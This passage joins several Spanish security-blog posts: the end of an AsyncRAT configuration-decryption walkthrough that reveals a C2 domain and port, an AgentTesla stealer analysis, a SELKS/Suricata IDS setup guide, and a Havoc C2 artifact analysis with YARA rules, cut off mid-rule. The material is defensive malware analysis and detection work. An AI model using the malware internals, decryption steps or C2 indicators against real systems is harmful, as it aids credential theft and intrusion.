"Qg1fflVUG+sZfjWjrP1LvlFXO7FB12DnfCTvCU1GgR6mUdufwTRyAZECtfXKvbzosQnHAsy3sb4KRt+YamodEqOzdZlg+QVlGiV+Tnm685E=", "Anti": "ANB5Wg7NpGOSoPE9CPwnbTe0NNhYscju0B1jWMAv1670pcVE1iPUxRqLHjsRYO7avPNGz8m+ag2hcXFF2p5nHg==", "Anti_process": "jp7Yt8T/KJr62V/Vj8WbipMo6UPVYkZNjKYJPiMhEUjwgqvR4Jlogpg7w3pNm5oKAKJxEOsIB3zhZxrHYaz0cg==", "Pastebin": "Oi9x4/vUoRorHNgF4zofqBMP+H5bwYNM8Zwb2USs8i93No3lE5ySdR+pe7f36fRhzZNrVAr+2RQvDI86Jg5Nkw==", "BDOS": "KesByLczwA3qZfXKAk61W+FaiA2UYTB/deTkOPHsy84J3BD826X0V00JoeDX9yFozzgvT3Egz54RSpHYS6AXzA==", "Group": "2IAJvkc+nIX3STcyCydIZwKg4+71FP7JEGgFm0m4BbAkQO9hI9O6cVY2R0BQByL+7f5L3lsyIcYp7BDLoFIIsA==", } key = b64decode(key) dec_key = pbkdf2_hmac("sha1", key, salt, 50000, 32) for k, v in config.items(): data = b64decode(v) iv = data[32:48] decrypted = unpad(aes.cbc.decrypt(dec_key, iv, data[48:])) #print("{}: {}".format(k, decrypted.decode("utf-8"))) print("{}: {}".format(k, decrypted.decode("utf-8", errors="ignore"))) ``` La única complicación que podemos tener es encontrar el Salt. Para ello realizamos un grep de lo siguiente: ``` $ grep -R Rfc2898DeriveBytes * XzgUWcJZDlpjQi/IKYaxvjpzNF.cs: using (Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(jWUckzASepqH, IKYaxvjpzNF.EmnIqkUAJWA, 50000)) ``` Y tenemos que en este fichero XzgUWcJZDlpjQi/IKYaxvjpzNF.cs estaría lo que buscamos. [Imagen: Salt Malware] Lo probamos y obtendremos el Command and Control: ``` $ python3 asyncrat_decrypt.py Ports: 2727 Hosts: mono2024.kozow.com Version: | Edit 3LOSH RAT Install: false MTX: AsyncMutex_6SI8OkPnk Anti: false Anti_process: true Pastebin: null BDOS: false Group: Default ``` > Y como siempre, ¿Cómo podemos detectar este troyano? Con la regla de CAPE se detecta perfectamente ``` rule AsyncRat { meta: author = "kevoreilly, JPCERT/CC Incident Response Group" description = "AsyncRat Payload" cape_type = "AsyncRat Payload" strings: $salt = {BF EB 1E 56 FB CD 97 3B B2 19 02 24 30 A5 78 43 00 3D 56 44 D2 1E 62 B9 D4 F1 80 E7 E6 C3 39 41} $b1 = {00 00 00 0D 53 00 48 00 41 00 32 00 35 00 36 00 00} $b2 = {09 50 00 6F 00 6E 00 67 00 00} $string1 = "Pastebin" ascii wide nocase $string2 = "Pong" wide $string3 = "Stub.exe" ascii wide $kitty = "StormKitty" ascii condition: uint16(0) == 0x5A4D and not $kitty and ($salt and (2 of ($str*) or 1 of ($b*))) or (all of ($b*) and 2 of ($str*)) } ``` Lo probamos: ``` $ yara AsyncRat.yar . AsyncRat ./400000.MSBuild.exe ``` Ahora ya conocemos un poco mejor este troyano, espero que os haya gustado y nos vemos en el siguiente post. ¡¡Hasta otra!! --- # Stealer AgentTesla : Análisis y detección URL: https://ciberseguridad.blog/stealer-agenttesla-analisis-y-detecion/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2024-02-11 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Hola a tod@s!! Últimamente he visto un repunte del stealer AgentTesla, así que me he decidido a dedicarle un post para ver cómo podemos identificarlo rápidamente, desde que llega al correo hasta si nos lo encontramos directamente en uno de los procesos de una máquina que estemos analizando, esperemos que esto no nos pase nunca, jeje. Antes de empezar, vamos a recordar " quién es AgentTesla " : Agent Tesla es un software espía que recopila información sobre las acciones de sus víctimas median Hola a tod@s!! Últimamente he visto un repunte del stealer AgentTesla, así que me he decidido a dedicarle un post para ver cómo podemos identificarlo rápidamente, desde que llega al correo hasta si nos lo encontramos directamente en uno de los procesos de una máquina que estemos analizando, esperemos que esto no nos pase nunca, jeje. Antes de empezar, vamos a recordar " quién es AgentTesla " : > Agent Tesla es un software espía que recopila información sobre las acciones de sus víctimas mediante el registro de pulsaciones de teclas e interacciones del usuario. Se comercializa falsamente como un software legítimo en el sitio web dedicado donde se vende este malware. Más abajo podemos leer: > El software espía está creado utilizando el Framework de software .Net. Su objetivo es robar datos personales y transmitirlos de vuelta al servidor C2. El malware es capaz de acceder a información de navegadores web, clientes de correo electrónico y servidores FTP. > Además, el malware de Agent Tesla puede realizar capturas de pantalla y videos. También puede grabar información del portapapeles y valores de formularios. Digamos que sería como el punto de entrada para poder acceder a los datos de los usuarios que consiga comprometer, acceso a las credenciales de los navegadores > Cuidado si decidís guardar las credenciales al autenticarte en algún sitio lo mismo ocurre con las credenciales guardadas en los clientes de correos (¿seguro que queremos guardarlo para no tener que introducirlas cada vez que accedamos?) o los clientes de FTP. Alguno pensaréis, da igual, capturas las teclas y te las pillaran igualmente. Bueno, la cosa es ponerlo lo más difícil a los atacantes. Podemos ver como en la plataforma de Any.run se registran una serie de IOC: [Imagen: IOCs Stealer AgentTesla] Vemos como aparecen URLs, de FTP, de la api de Telegram, dominios, IP, etc. Esto es debido a existen diferentes formas de exfiltrar los datos que sea capaz de obtener, es configurable, puedes utilizar cualquiera de esos métodos. Veamos unos ejemplos de como llegan por correo, por ejemplo: [Imagen: Correo Tesla Stealer] Las facturas siempre son atractivas para los atacantes, ¿Quién no trata de comprobar una factura que, a priori, no ha solicitado? Si nos fijamos en la extensión, no es un zip o un rar o un 7zip. ¿O sí lo es? [Imagen: Archivo Mail Stealer Tesla Malware] Pues se trata de un fichero comprimido con RAR. [Imagen: Archivo rar Malware] Así que podemos renombrarlo a .rar o abrirlo directamente con Winrar como ya habíamos hecho. > ¿Por qué le cambian la extensión origial .rar a .gz? Lo que se me ocurre es para tratar de confundir a las herramientas que analizan según la extensión. Si fuese RAR el Antivirus de turno podría entrar en acción mientras que si es un GZIP, puede que no se comporte como se espera. Además de parecer que podría ser inocuo de alguna forma. El caso es que se ven muchos .tar, .gz, etc. que son en realidad ficheros RAR. Esto ya nos puede hacer que desconfiemos sobre lo que se oculta dentro de ese fichero, podría ser malicioso. Empezaremos con el análisis estático, se trata de un binario .Net para arquitecturas de 32 bit. [Imagen: Libreria .Net maliciosa] ¿Es reciente? [Imagen: Fecha de creación de libreria net maliciosa] Mira por donde, la posible fecha de compilación (ojo con esto que se puede alterar fácilmente como podéis comprobar en esta muestra) es de 2102, faltan muchos años para que se cree, ¿verdad? xD Otra característica más para desconfiar, una muestra que viaja en el tiempo. Como está compilada con .Net, podemos echarle un vistazo rápido con dnSpy y ver su código fuente, la idea es tratar de identificar ese comportamiento que nos mencionaba Any.run. [Imagen: Análisis Dnspy de libreria .Net maliciosa] Nos fijamos en el punto de entrada y pulsamos sobre él. [Imagen: Punto de entrada de la librería .NET maliciosa del Stealer Tesla] Vemos en las funciones de la izquierda nombres que no tienen mucho sentido, lo que implicaría ofuscación. No lo quieren poner fácil, es normal, la mayoría de las aplicaciones .Net se ofuscan ya que con herramientas como esta, se puede llegar al código fuente original. Podemos observar como aparecen funciones relacionadas con criptografía, por lo que posiblemente, esta muestra no sea el malware final, sino que se encuentra cifrado y en algún momento lo descifrará y ejecutará. [Imagen: Descifrado para libreria ofuscada para posterior ejecución de Malware] Así que tenemos 2 opciones, seguir con el reversing (más tiempo) o ejecutar, esperar y extraer. Abrimos Procmon para ver el comportamiento: [Imagen: Ejecución de Procmon] Esta herramienta tiene una opción de mostrar un árbol de procesos de la ejecución. [Imagen: árbol de procesos de la ejecución Procmon] En donde podemos observar una inyección en el mismo proceso, Process Hollowing. Pues utilizamos la herramienta Hollows_hunter32.exe para extraer el malware de segundo PID que vemos, del 2352. [Imagen: Hollows Hunter Liberia Maliciosa Stealer Tesla] Aunque si preferís poner breakpoints y capturar la muestra final, podéis ir directamente a las API ReadProcessMemory, VirtualAllocEx y varios WriteProcessMemory. [Imagen: API ReadProcessMemory VirtualAllocEx y varios WriteProcessMemory] Aparecen un par de binarios dentro del directorio, el que nos interesa es “400000.soya crypted.exe”. Otra aplicación .Net. [Imagen: App de cifrado interna 400000.soya] > ¿Será también una muestra del futuro? Esta no, es del pasado, cercano… [Imagen: Fecha de libreria .NET con fecha pasada cercana en el malware] Si pulsamos en el punto de entrada, aterrizamos aquí y vemos de nuevo, que las funciones aparecen ofuscadas: [Imagen: Funciones ofuscadas] Usaremos De4Dot para desofuscarlas, seguro que algo mejora y así ha sido, ya vemos el Main. [Imagen: De4Dot Library Decript] Han aparecido algunas funciones que antes no estaban como ns0 y ns1. Ahora ya no queda otra que bucear en el código fuente para detectar todas las acciones maliciosas que realiza este malware. Veamos un ejemplo, no podemos ver todos porque son muchos, en este caso vemos como trata de buscar credenciales en un fichero llamado logins.json, perteneciente al navegador Mozilla Firefox. [Imagen: Búsqueda de credenciales en Firefox Malware Stealer Tesla] Este sería el aspecto de ese fichero logins.json que busca: [Imagen: Archivo Login.json sobre el que el Malware busca credenciales] Si encuentra credenciales que pueda descifrar, estaremos perdidos: [Imagen: Desencriptar contraseñas del navegador guardadas] Así que pensaros si realmente queréis almacenar credenciales en los navegadores o usar algún gestos de contraseñas, ahí lo dejo. No solamente extrae las credenciales de Firefox, sino de multitud de navegadores y clientes, lo podemos ver a continuación: [Imagen: Lista de navegadores que ataca el Stealer Tesla] Podemos exportar el proyecto y así poder trabajar con “grep”, más rápido para identificar ciertos comportamientos: ``` $ grep VA9 p3N5Y/fAUNhG4wfK.cs | grep true | awk -F\" '{print $2}' Opera Browser Chromium BlackHawk Flock Citrio CyberFox Sleipnir 6 Liebao Browser Coccoc Uran Iridium Browser Sputnik WaterFox Postbox K-Meleon Coowon CentBrowser IceCat Torch Browser Chrome Orbitum PaleMoon 360 Browser Epic Privacy IceDragon Firefox Edge Chromium 7Star SeaMonkey Elements Browser Comodo Dragon Amigo QIP Surf Yandex Browser Chedot Cool Novo Brave Vivaldi Thunderbird Kometa ``` Da miedo, ¿verdad? Son muchísimos clientes, ¿Quién no usa alguno de ellos? Digamos, que este malware sabe como obtener las credenciales almacenadas en todos ellos. A la hora de mostrar los resultados, dependiendo de si es en formato texto o html, muestra los siguientes datos, en este caso en formato texto: [Imagen: Búsqueda de credenciales en los navegadores] Otra de las características es que tenía capacidades de Keylogger, y aquí tenemos el fichero que deberíamos buscar para comprobar si estamos comprometidos. En el directorio temporal, log.tmp. [Imagen: IOCs stealer malware] Para profundizar como lo hace, se puede acceder a la función correspondiente: [Imagen: Guardado de credenciales en los logs] También capturaba el portapapeles, como podemos comprobar. [Imagen: Captura de portapapeles Malware] Y realizar capturas de pantalla: [Imagen: Capturas de pantalla malware] Además de todo lo que encuentre, envía información sobre la máquina en cuestión: ``` $ grep -E "
.*;" ppkr/HaT.cs | awk -F\" '{print $2}' | sed 's/
//g' RAM: OSFullName: Computer Name: User Name: IP Address: CPU: ``` Llegados a este punto nos interesa, sobre todo, saber a donde se van a enviar las credenciales o los datos obtenidos, y en este caso tenemos que será por correo a través del protocolo SMTP. Esto se encuentra en la configuración del malware: [Imagen: Servidor exfiltracion de malware Stealer] ¿Podemos detectar este malware con reglas Yara? Como suelo utilizar CAPE, pondré la regla Yara incluída en la sandbox. Comprobando antes que lo detecta: ``` $ yara AgentTesla.yar . AgentTeslaV3 400000.soya crypted.exe ``` ¡Lo detecta!, así que nos sirve. Espero que os haya gustado el post y nos vemos en el siguiente. ¡¡¡Hasta otra!!! --- # SELKS : Un IDS Suricata vitaminado URL: https://ciberseguridad.blog/selks-un-ids-suricata-vitaminado/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-01-23 Actualizado: 2026-10-08 Tema: Laboratorios de ciberseguridad > Opensource en ciberseguridad con Suricata IDS en SELKS! Aprende cómo la detección de intrusos te ayuda a proteger tu red y mantenerla segura. Después de unos cuántos meses publicando más bien poco ( 🙏🏻 ), retomamos este 2024 cargado de energías. Una pequeña pausa necesaria, que unida a un pequeño de casi 2 años era necesario tomar. En este tiempo han ocurrido grandes cosas, como el premio a la divulgación de ESET (sobre el que realizaré un post específico) y otras muchas. Un tiempo de mucho trabajo, pero también de mucha reflexión. Por lo que arrancamos es de 2024 instalando una sonda Open Source en nuestro entorno virtualizado, que nos dará una visibilidad ampliada de lo que posiblemente ya estemos viendo en nuestro firewall (sí disponemos de un licenciamiento IDS), en las distintas variantes que tienen los fabricantes, o en caso de no disponer de dicho licenciamiento, nos dará una gran visibilidad de lo que ocurre en nuestra red. Por ello nos hemos basado en una alternativa conocida ampliamente en el sector que es Suricata, pero sobre la que en muchas ocasiones es difícil trabajar debido a la falta de un entorno gráfico o posibles herramientas de búsqueda más sencillas. Por eso hoy venimos con SELKS SELKS es una plataforma de seguridad de red de código abierto que se ofrece de forma gratuita bajo la licencia GPLv3 de Stamus Networks . Esta potente herramienta se basa en sistemas de Detección y Prevención de Intrusiones (IDS/IPS) y Monitorización de Seguridad de Red (Network Security Monitoring). La instalación de SELKS es extremadamente versátil y sencilla, ya que puede ser desplegada en sistemas operativos Linux o Windows mediante Docker Compose, y una vez que se completa la instalación, SELKS se encuentra completamente operativo y listo para ser utilizado como una solución de seguridad integral y lista para su uso. Ademas de ello, y como veremos hoy , SELKS ofrece la flexibilidad de ser implementado mediante imágenes ISO en entornos con restricciones de conectividad o para su nuestra instalación en hardware físico o máquinas virtuales (VM). En nuestro caso un ESXI, aprovechando que estamos haciendo un Port mirror de todo el trafico de la red ( Veremos como configurarlo en ESXI, que con lo sencillo que es, me trajo de cabeza por la falta de información al respecto ). ## SELKS Como os trasladaba anteriormente , SELKS, es una interfaz basada en Suricata , pero vitaminada , y de ahí las iniciales , con un conjunto de aplicaciones que le dan su nombre: - S - Suricata IDPS/NSM - E - Elasticsearch - L - Logstash - K - Kibana - S - Scirius - EveBox - Arkime - CyberChef Como podéis ver, el acrónimo se estableció antes de la adición de Arkime, EveBox y nuestro famoso cocinero, CyberChef. El potencial de SELKS , podemos verlo desde el inicio, en uno de los muchos paneles que vienen configurados en la plataforma, creados por profesionales ampliamente reconocidos en el sector: [Imagen: Paneles adaptables de SELKS] Quitando las ya conocidas herramientas , Elasticsearch, Logstash y Kibana , podríamos describir de una forma rápida el resto de herramientas : - Suricata IDPS/NSM (Intrusion Detection and Prevention System/Network Security Monitor):Suricata es un sistema de detección y prevención de intrusiones de red (IDPS) y un monitor de seguridad de red (NSM) de código abierto.Se utiliza para analizar el tráfico de red en busca de patrones sospechosos o amenazas, como ataques de intrusión, malware, o actividades maliciosas. - Scirius:Scirius es una interfaz de usuario web que proporciona una capa de gestión para Suricata.Facilita la configuración, monitorización y administración de reglas de seguridad en Suricata. - EveBox:EveBox es una aplicación web que se utiliza para visualizar y analizar registros de eventos de seguridad generados por Suricata y otros sistemas de seguridad.Ofrece gráficos, búsquedas avanzadas y capacidades de análisis para ayudar a los administradores de seguridad a comprender mejor las amenazas y los incidentes en su red. - Arkime (anteriormente conocido como Moloch):Arkime es una plataforma de código abierto diseñada para la captura, indexación y búsqueda de tráfico de red a gran escala.Permite el almacenamiento de paquetes de red y su análisis posterior, lo que facilita la investigación de incidentes y la identificación de amenazas. - CyberChef ( Un viejo conocido ):CyberChef es una herramienta de código abierto que proporciona una amplia gama de funciones para el análisis y manipulación de datos en formato hexadecimal, base64 y otros.Es útil para decodificar, codificar, encriptar, desencriptar y realizar diversas operaciones en datos de manera eficiente. ## Instalar SELKS de una forma fácil y rápida Si vamos directamente a la pagina de SELKS , podemos observar que tenemos varias formas de realizar la instalación, aunque convergen todas en un punto central, que es la instalación de Docker y los distintos paquetes que lo incluyen ( diferenciado por las distintas herramientas que hemos visto ) [Imagen: Opciones de instalación de SELKS] En nuestro caso y para poder mostrar el contenido de SELKS de una forma más visual, y fácil de montar en el entorno de laboratorio, hemos optado por descargar la imagen .ISO y montarla en un ESXI. PD: Si, los Reyes me han autorregalado un Mac. ;) [Imagen: Descarga de imagen .iso de SELKS] Una vez descargada la imagen , y cargada en el datastore de nuestro ESXI para que pueda arrancar como imagen en el bootable de la unidad óptica , podemos proceder a crear una nueva máquina virtual. En la imagen veis que la distribución puse que se basa en Debian 9 , fallo mio, aunque no tiene ninguna implicación, se basa en Debian 11. [Imagen: Creación de la maquina SELKS para ESXI] Tras alguna prueba , os dejo los requisitos mínimos que veo que debe tener la máquina para que funcione correctamente, que básicamente son 16Gb de memoria , el disco que estiméis para almacenar ( lo usara elásticsearch ) , y por supuesto, dos tarjetas de red, sobre la que administraremos y sobre la que haremos el portmirror de la red: [Imagen: Configuración SELKS tarjetas de red] Una de las cosas más sencillas y que más me dio dolores de cabeza , fue el realizar el portmirror en ESXI , en el que no conseguía que me llegase a funcionar. En muchos foros podréis ver que hablan de poner el ID VLAN a 0 ( cero ) , pues , todo lo contrario, con VLAN ID 0 , lo que estamos indicando al ESXI, es que las VLANs vienen sin tagear ( cada vlan tiene un id tag ) . Por lo que tras varias pruebas y muchos foros , vimos que el tagid , solo llega hasta el 4094, lo que hace que si indicamos 4095 , coja todos los tagid , cuestión imprescindible para poder ver todo el trafico del portmirror. Si indicásemos un VLAN ID concreto, podríamos llegar a ver el trafico concreto de solo la VLAN ID que queremos, el cual podría llegar a ser el caso concreto que nos gustaría implementar. [Imagen: Portmirror en ESXI] Una vez, levantada la maquina , configurado las distintas tarjetas en nuestro ESXI, ya podemos proceder a arrancar la imagen e iniciar la instalación. [Imagen: Maquina con Port Mirror en Vmware ESXI] Una vez iniciada la imagen , tenemos la posibilidad de lanzarla como un Live CD sin necesidad de instalar, pero en nuestro caso, queremos realizar la instalación de SELKS de forma permanente , lanzando las alertas incluso al SIEM. Por ello, procedemos con la instalación. [Imagen: Terminal ESXI instalación de SELKS] Como os trasladaba anteriormente , una distribución basada en Debian 11: [Imagen: Debian 11 IDS] Si todo fue correcto, la propia instalación detectará ( sin asignación de IP aún ), las dos tarjetas de red que hemos indicado en la creación de la máquina ( una para administración - otra el Port Mirror ). [Imagen: Tarjetas de red para hacer el Port Mirror IDS SELKS] En la imagen , nos solicita la ip que queremos como principal. Esta no es la IP sobre la que queremos aplicar el IDS, que más adelante veremos como configurarla , si no la propia tarjeta que usara la máquina , y sobre la que deberemos dar una ip, mascara y unos DNS para que pueda proceder con la instalación. Una vez finalizada la instalación de la imagen , dispondremos en nuestro caso, de un sistema sobre el que podremos hacer login, y sobre el que en primera instancia , tardara algo en dar un posterior acabado SELKS. [Imagen: Login en IDS SELKS] Las credenciales que nos solicitan , podemos obtenerlas de la WIKI Github de SELKS: IMPORTANTE: aunque en la captura veis que indica que para el usuario root la contraseña es StamusNetworks , a mi no me funcionó, siendo la misma que indica para el SO ( selks-user ). [Imagen: Credenciales SELKS] Pero ojo, de momento , no tenemos instalado SELKS , si no que tenemos instalado el SO que soportará SELKS con todo lo necesario para su instalación, encontrándonos en el propio escritorio , el documento con los comandos necesarios para lanzar la instalación. En nuestro caso, instalación guiada, ya que no sabíamos que necesitaríamos , como interfaces donde será monitorizado el trafico. [Imagen: Instalación IDS SELKS] La instalación tarda aproximadamente 10-15 minutos , por lo que tener paciencia , ya que debe montar todos los Dockers necesarios para levantar el entorno. [Imagen: Instalación de Docker de SELKS] Una vez concluido el despliegue , nos solicitará la interfaz sobre la que queremos monitorizar, que si recordáis en nuestro caso, dividimos en interfaz de gestión de la propia plataforma ( ens194 ) , y sobre la que hacíamos el PortMirror como podéis ver en las capturas de arriba ( ens224 ). [Imagen: Terminal de SELKS solicitando elegir la interfaz de red para monitorizar tráfico] Por lo que una vez seleccionada la interfaz a monitorizar ( ens224 ), se levanta el propio sistema con dicha configuración. [Imagen: Levantamiento IDS SELKS] Pero ojo, que no arranca, por lo que necesitamos un ultimo paso. Creo que el sistema lo traslada en sus mensajes, si no, esta el documento , y si no ... ya lo sabéis: [Imagen: Terminal ejecutando docker-compose up para levantar los contenedores de SELKS] Todo en orden: [Imagen: Docker Compose Suricata IDS SELKS] Ahora si que si, podemos entrar en el SELKS ( no en el SO ) , accediendo directamente desde la ip que hayamos asignado al equipo ( gestión ) , para poder ver la monitorización de Port Mirror. Donde veréis en un lateral , las distintas APPS desplegadas: [Imagen: Herramientas SELKS] Y ya podemos por ejemplo ver el resultado en menos de 24h de desplegar una herramienta de este tipo en nuestra organización a coste 0, y es que nos da muchísima visibilidad en puntos , donde tal vez un NGFW distorsione tanta información que obtiene . Resultado de ello a cortisimo plazo, se han identificado accesos con dyndns , herramientas para p2p muy especificas que el FW no detectaba y que ya podemos controlar, sistemas que trabajaban con password en texto plano .... y mucho más ( En cada casa tenemos lo nuestro ... por si algún iluminado le da por indicar que como es posible ... fruto de no mirarse al ombligo ) . [Imagen: Threat hunting Suricata] La vista anterior, es la que mas me gusta , de "Hunting" , pero por ejemplo, podemos tener una mas extensa en Everbox: [Imagen: Vista Everbox Suricata SELKS] Pero que nos trae toda la información de la firma en sí: [Imagen: Firma Suricata] Fruto de varias pruebas , creo que la configuración de sistema es la correcta. Incluso podríamos bajar algo la CPU. El disco no, ya que nos gustaría mantener algo el tiempo de retención ( los logs rotarán al llegar al máximo ) [Imagen: Panel Scirius Community Edition mostrando la actividad de reglas de Suricata] Como punto importante , trasladar que podemos , como buen sistema IDS , importar nuestras propias reglas YARA [Imagen: Página de Scirius listando el ruleset por defecto con 40470 reglas de Suricata] ## Integrando SELKS son SIEM / SOAR Uno de los grandes puntos de SELKS, es la propia integración de Elasticsearch / Kibana , que nos proporciona una amplísima visibilidad del estado de la seguridad. ELK en SELKS nos proporciona de forma predeterminada, distintos Dashboard y tablas , lo que hace que podamos realizar la integración directamente desde ELK a nuestro SIEM / SOAR de una forma "filtrada" , siendo como es normal estos sistemas , quienes nos alerten con nuestros flujos predefinidos del SOC. [Imagen: Lista de dashboards de Kibana con nombres como SN-ALERTS y SN-ANOMALY] Como podeis observar , este es uno de los Dashboard que trae SELKS, y la gran visibilidad que nos da ( Este solo es un ejemplo, pero ya veis arriba todos los que trae ): [Imagen: Dashboard SN-ALERTS de Kibana con gráficos circulares de tráfico y 120.713 alertas] Espero que disfrutaseis el post . Os animo a que lo despleguéis , aunque sea de pruebas , y ante todo , os pido disculpas por tardar tanto en actualizar el blog. Un fuerte abrazo .... arrancamos 2024. --- # Encontrando artefactos de Havoc URL: https://ciberseguridad.blog/encontrando-artefactos-de-havoc/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2023-11-06 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Havoc, una alternativa a Cobalt Strike, cuyo objetivo es comprometer equipos con Frameworks de Post-explotación. Descubre como detectarlos. Hola a tod@s!! Me he encontrado últimamente con artefactos cuyo objetivo es comprometer equipos con artefactos de Havoc (Framework de Post-explotación), salvando las distancias, una alternativa a Cobalt Strike del que tanto hemos hablado. Veremos este en concreto: [Imagen: Virus Total Havoc] Como podemos observar, varios motores Antivirus lo detectan bien, eso sí 10 de 60 detecciones, pocas en mi opinión, a medida que pase el tiempo esto aumentará según se vaya reanalizando. Si lo editamos veremos que no es un EXE o una DLL, según nos decía Virus Total, se trata de un fichero GZIP: [Imagen: GZIP Havoc Virus Total] Este tipo de artefactos, no son directamente ejecutados, sino que son utilizados por un Downloader, descarga, trata y ejecuta. Si prestamos atención al fichero, podemos ver que hay un magic number familiar MZ dentro del mismo, lo extraemos, abrimos un editor hexadecimal y eliminamos todo hasta ese MZ. [Imagen: Magic Number Malware] Y ya tenemos una DLL que podemos analizar, sería el implante DLL “Demon”, en adelante. [Imagen: Demon enlazador DLL MZ Hexadecimal] Lo primero que podemos hacer es echarle un vistazo a las cadenas o strings: [Imagen: cadenas o strings DLL] Vemos funciones de API como "SeImpersonatePrivilege" y "SeDebugPrivilege," que están relacionadas con los privilegios de seguridad en el sistema operativo Windows. Estos privilegios son utilizados para permitir o restringir ciertas operaciones críticas y de seguridad en el sistema. > Vemos referencias a Winlogon y kerberos, un user-agent, lo que parece un dominio y un par de rutas de la aplicación bloc de notas (32 y 64 bits). Algo interesante es que aparece el nombre de una DLL y lo que parece una función: [Imagen: Clase DLL Malware Havoc] Lo abrimos con PE Bear y vemos lo siguiente, el nombre que se le puso a esa DLL y una función. Exports llamada Start, como veíamos en la anterior captura: [Imagen: Export PE Bear - Start] Normalmente, suelen venir acompañadas de multitud de funciones Imports, pero en este caso, no vemos ninguna. [Imagen: Imports PE Bears Malware Havoc] ¿Qué está pasando entonces? Si vamos a esa función Start, por ejemplo, podemos comprobar como aparecen valores en hexadecimal, por ej. 0xADD31DF0 [Imagen: Offset 0xADD31DF0 Havoc] Si buscamos este valor en el código de Havoc, vemos la forma que utilizan para ir cargando las diferentes API sin tener que llamarlas directamente: [Imagen: Código Havoc análisis de malware] Según su código fuente, la rutina API Hashing se utiliza para encontrar la ubicación en memoria de varias funciones del Sistema de Programación de Aplicaciones de Windows (NTAPI). Esto se logra examinando la tabla de direcciones de exportación en la DLL "ntdll.dll", específicamente utilizando una función llamada "LdrFunctionAddr". Para empezar, la dirección virtual de la biblioteca "ntdll.dll" se recupera al examinar la información contenida en el PEB o Bloque de Entorno de Proceso. Y si profundizamos en el código vemos que el algoritmo de hash utilizado para este propósito es una variante modificada del algoritmo "DJB2", y se basa en la constante numérica "5381". [Imagen: 5381 Havoc] Pero nos falta algo, y es la shellcode que carga todo esto y que no se encuentra en la DLL sino que se encuentra antes de la misma, en el payload inicial. Me refiero a esto que puede verse en el Github del Framework. [Imagen: Payloads Havoc] Y, efectivamente, podemos ver como se encontraba antes de la DLL: [Imagen: Inclusion anterior a DLL] Continuando con el código fuente, se emplea una técnica de búsqueda del tipo API Hashing para encontrar las direcciones virtuales correspondientes a un módulo específico y a las funciones del Sistema de Programación de Aplicaciones de Windows (NTAPI). En este proceso, se compara un valor hash generado a partir del algoritmo DJB2 con los hashes previamente codificados. Adicionalmente, se carga en memoria la biblioteca DLL "Demon” embebida, y si es necesario, se calculan las reubicaciones de base. Esto implica ajustar las ubicaciones de memoria asignadas para que coincidan con la biblioteca. En caso de requerirse, las medidas de seguridad de la página de memoria se modifican mediante múltiples llamadas a la función "NtProtectVirtualMemory", que se encarga de establecer los permisos adecuados para proteger la memoria asignada. Este proceso se realiza de forma dinámica para garantizar que las operaciones se realicen de manera segura y eficiente. [Imagen: Entry Havoc] Volviendo a la DLL extraída del artefacto inicial, si vamos al EntryPoint, y buceamos en sus funciones podemos ver cómo son utilizados esos hashes de API: [Imagen: hashes de API] Se obtiene las direcciones virtuales de funciones de módulos como "ntdll.dll" y "kernel32.dll" llamando a la Rutina de Hashing de API que vimos anteriormente. Recupera los "Syscall stubs" (bloques de código para llamadas al sistema) para diversas funciones del Sistema de Programación de Aplicaciones de Windows (NTAPI). Se carga varios módulos recorriendo las estructuras de datos del PEB o Entorno de Bloque de Proceso con cadenas de texto recopiladas. Inicializa objetos de sesión y configuración de la DLL "Demon". La de la configuración podemos obtener lo que se mencionó al ver las cadenas, en qué aplicación se inyectará el proceso, notepad.exe, el user-agent utilizado, el dominio, aunque no se ve en la captura siguiente, utilizando el método POST. [Imagen: Havoc Notepad Malware] Vamos a la parte de la detección, encontré un par de reglas Yara para detectar este tipo de artefactos: ``` rule win_havoc_djb2_hashing_routine_oct_2022 { //Detects the hashing routine used in Havoc C2 meta: author = "embee_research @ HuntressLabs" vendor = "Huntress Research" date = "2022/10/11" strings: // Hashing Routine of DLL $dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef} //Hashing Routine of Shellcode $shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4} condition: //PE or Shellcode or Shellcode //Leave as "any of them" for more robust (but compute expensive) searching (any of them) and (uint16(0) == 0x5a4d or uint16(0) == 0x00e8 or uint16(0) == 0x4856) } ``` Y esta otra regla Yara: ``` rule win_havoc_ntdll_hashes_oct_2022 { //Detects ntdll API hashes used in Havoc C2 Demon payloads meta: author = "embee_research @ HuntressLabs" vendor = "Huntress Research" date = "2022/10/11" description = "Detection of havoc demons via hardcoded ntdll api hashes" strings: // Syscall Hashes $nt_hash1 = {53 17 e6 70} //0x70e61753 == ntdll.dll $nt_hash2 = {43 6a 45 9e} //0x9e456a43 == LdrLoadDll $nt_hash3 = {ec b8 83 f7} //0xf783b8ec == NtAllocateVirtualMemory $nt_hash4 = {88 28 e9 50} //0x50e92888 == NtProtectVirtualMemory $nt_hash5 = {f6 99 5a 2e} //0x2e5a99f6 == LdrGetProcedureAddress $nt_hash6 = {da 81 b3 c0} //0xc0b381da == NtAllocateHeap $nt_hash7 = {d7 71 ba 70} //0x70ba71d7 == RtlFreeHeap $nt_hash8 = {88 2b 49 8e} //0x8e492b88 == RtlExitUserThread $nt_hash9 = {ef f0 a1 3a} //0x3aa1f0ef == RtlExitUserProcess $nt_hash10 = {f5 39 34 7c} //0x7c3439f5 == RtlRandomEx $nt_hash11 = {70 f2 ab 35} //0x35abf270 == RtlNtStatusToDosError $nt_hash12 = {1d aa a3 3c} //0x3ca3aa1d == RtlGetVersion $nt_hash13 = {11 b2 8f f7} //0xf78fb211 == RtlCreateTimerQueue $nt_hash14 = {4c 7c de a5} //0xa5de7c4c == RtlCreateTimer $nt_hash15 = {90 fe 61 95} //0x9561fe90 == RtlDeleteTimerQueue $nt_hash16 = {d0 ee 33 77} //0x7733eed0 == RtlCaptureContext $nt_hash17 = {a9 af 4b 55} //0x554bafa9 == RtlAddVectoredExceptionHandler $nt_hash18 = {0e 21 0c 88} //0x880c210e == RtlRemoveVectoredExceptionHandler $nt_hash19 = {3d 13 8e 8b} //0x8b8e133d == NtClose $nt_hash20 = {7d 74 58 ca} 